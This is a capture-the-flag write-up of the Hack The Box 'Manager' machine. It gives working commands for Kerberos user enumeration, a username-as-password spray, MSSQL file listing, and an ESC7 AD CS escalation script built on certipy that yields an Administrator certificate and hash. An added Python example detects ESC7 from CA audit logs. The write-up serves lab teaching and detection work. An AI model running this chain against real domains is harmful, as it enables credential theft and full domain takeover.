Manager
Created by Geiseric
The following post by 0xb0b is licensed under CC BY 4.0
Recon
The target host has multiple open ports that point to a Windows environment: DNS, a Microsoft IIS web server, Active Directory LDAP, Microsoft SQL Server 2019, RPC services, and others, all of which are candidates for further enumeration. We are dealing with a domain controller, and the Nmap scan gives us the domain and computer name:
manager.htb
dc01.manager.htb
ports=$(nmap -p- --min-rate=1000 -T4 manager.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports manager.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 08:38 EDT
Nmap scan report for manager.htb (10.129.120.237)
Host is up (0.029s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-16 19:38:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.120.237:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.120.237:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-16T19:30:16
|_Not valid after: 2054-03-16T19:30:16
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-16T19:40:06+00:00; +6h59m50s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49693/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49694/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49730/tcp open msrpc Microsoft Windows RPC
52872/tcp open msrpc Microsoft Windows RPC
52918/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m50s, deviation: 0s, median: 6h59m49s
| smb2-time:
| date: 2024-03-16T19:39:30
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 95.94 second
When enumerating the website, nothing could be detected apart from static web pages.

We are probably dealing with an Active Directory challenge. We can enumerate users with Kerbrute, using the xato-net-10-million-usernames.txt list from SecLists.
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ ./kerbrute_linux_amd64 userenum -d manager.htb /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt --dc dc01.manager.htb

Initial Foothold
We use the output to create a user list.
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ sed -n 's/.*:\s*\([^@]\+\)@manager\.htb.*/\1/p' kerbrute-results.txt > usernames.txt
ryan
guest
cheng
raven
administrator
Ryan
Raven
operator
Guest
Administrator
Cheng
jinwoo
RYAN
RAVEN
GUEST
Operator
Next, we try a password spray against the SMB port with the help of NetExec. We also use the username list as the password list, in case a user has set their username as their password. We pass the --no-brute parameter so that each username is only tried with its own line of the password list, i.e. with itself. We get a hit for the user operator.
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ nxc smb manager.htb -u usernames.txt -p usernames.txt --no-brute --continue-on-success

Let's see if the credentials found also work for services other than SMB. We can log in to the MSSQL service.
┌──(0xb0b㉿kali)-[~/Documnts/htb-app/manager]
└─$ mssqlclient.py manager.htb/operator:operator@manager.htb -windows-auth

We can use xp_dirtree to list the folders and files on the system. In the wwwroot folder, we find the web.config and a backup zip.
EXEC xp_dirtree 'C:\inetpub\wwwroot', 1, 1;

Unfortunately, the web.config, which is a common location for stored credentials, cannot be retrieved directly. But the backup can.

In the backup, we find an old config that contains the credentials for the user raven.

Using Evil-WinRM we can log in to the system and find the user flag on the user's desktop.

Privilege Escalation
We use Certipy to look for a vulnerable Active Directory Certificate Services (AD CS) configuration.
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager]
└─$ certipy find -u raven@manager -p '<REDACTED>' -dc-ip 10.129.120.237 -vulnerable

We see that raven has dangerous permissions that allow the ESC7 attack.

A detailed explanation of the attack can be found here:
To carry out the attack we place the commands in a simple script, since they have to be issued in quick succession. The password has to be set, and if requests have already been made, REQUEST_ID has to be adjusted to the ID returned by the request step.
#!/bin/bash
# Set variables
CA='manager-DC01-CA'
USERNAME='raven@manager.htb'
PASSWORD='REDACTED'
TARGET='manager.htb'
REQUEST_ID='13'
# Command 1: Add officer
certipy ca -ca "$CA" -add-officer raven -username "$USERNAME" -password "$PASSWORD" &&
# Command 2: Enable template
certipy ca -ca "$CA" -enable-template SubCA -username "$USERNAME" -password "$PASSWORD" &&
# Command 3: Request
certipy req -username "$USERNAME" -password "$PASSWORD" -ca "$CA" -target "$TARGET" -template SubCA -upn administrator@manager.htb &&
# Command 4: Issue request
certipy ca -ca "$CA" -issue-request "$REQUEST_ID" -username "$USERNAME" -password "$PASSWORD" &&
# Command 5: Retrieve
certipy req -username "$USERNAME" -password "$PASSWORD" -ca "$CA" -target "$TARGET" -retrieve "$REQUEST_ID"
By executing the script we get the Administrator certificate.

With that, we can retrieve the admin hash. The next commands have to be issued in quick succession and might fail. Because of the clock skew of almost seven hours that the Nmap scan already showed, we first have to synchronize our time with the DC, otherwise Kerberos rejects the authentication.
┌──(0xb0b㉿kali)-[~/Documents/htb-app/manager/certipy]
└─$ sudo ntpdate -s manager.htb && certipy auth -pfx administrator.pfx

We use Evil-WinRM to log in as the Administrator by passing the retrieved hash. On the Desktop of the administrator, we find the final flag.
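The ESC7 chain above leaves a distinctive trail in the CA's Security log when Certification Services auditing is enabled. The following is an added example, not part of 0xb0b's write-up: a small Python correlation over constructed, simplified audit records (the `time|event_id|actor|detail` layout and the detail wording are assumptions, not the real event XML) that flags an officer grant followed within minutes by enabling SubCA and issuing a request whose SAN UPN names a different account than the requester.

```python
"""Correlate AD CS audit events into the ESC7 chain walked above (added example;
constructed log lines, not real exports). Standard Certification Services audit IDs:
4890 officer settings changed, 4891 CA config entry changed, 4886 request received, 4887 issued."""
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)  # steps closer together than this count as one chain

# Constructed sample, one event per line: time|event_id|actor|detail
SAMPLE_LOG = """\
2024-03-16T19:41:02|4890|MANAGER\\raven|officer added: MANAGER\\raven
2024-03-16T19:41:05|4891|MANAGER\\raven|CertificateTemplates changed: +SubCA
2024-03-16T19:41:09|4886|MANAGER\\raven|request 13 template SubCA upn=administrator@manager.htb
2024-03-16T19:41:14|4887|MANAGER\\raven|request 13 issued
2024-03-16T20:15:00|4886|MANAGER\\svc-web|request 14 template WebServer dns=www.manager.htb
2024-03-16T20:15:00|4887|MANAGER\\svc-web|request 14 issued
"""

def parse(log):
    events = []
    for line in log.strip().splitlines():
        ts, eid, actor, detail = line.split("|", 3)
        events.append({"time": datetime.fromisoformat(ts), "id": int(eid),
                       "actor": actor, "detail": detail})
    return sorted(events, key=lambda e: e["time"])

def detect_esc7(events):  # returns one alert per suspicious step of the chain
    alerts, officers, requests = [], {}, {}
    for ev in events:
        d, now = ev["detail"], ev["time"]
        recent = [p for p, t in officers.items() if now - t <= WINDOW]  # freshly granted officers
        if ev["id"] == 4890:  # new certificate manager: remember who and when
            m = re.search(r"officer added: (\S+)", d)
            if m:
                officers[m.group(1)] = now
        elif ev["id"] == 4891 and "+SubCA" in d and recent:
            alerts.append(f"SubCA enabled by {ev['actor']} shortly after officer grant to {recent}")
        elif ev["id"] == 4886:  # remember requester and any UPN asked for in the SAN
            rid = re.search(r"request (\d+)", d).group(1)
            upn = re.search(r"upn=(\S+)", d)
            requests[rid] = (ev["actor"], upn.group(1) if upn else None)
        elif ev["id"] == 4887 and ev["actor"] in recent:
            rid = re.search(r"request (\d+)", d).group(1)
            requester, upn = requests.get(rid, (ev["actor"], None))
            msg = f"request {rid} issued by freshly granted officer {ev['actor']}"
            if upn and upn.split("@")[0].lower() != requester.split("\\")[-1].lower():
                msg += f"; SAN UPN {upn} does not match requester {requester}"
            alerts.append(msg)
    return alerts
```

Running `detect_esc7(parse(SAMPLE_LOG))` yields two alerts for request 13 and none for the ordinary WebServer enrollment of request 14; in practice the same logic sits on top of a SIEM query for events 4886 to 4891 on the CA host.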
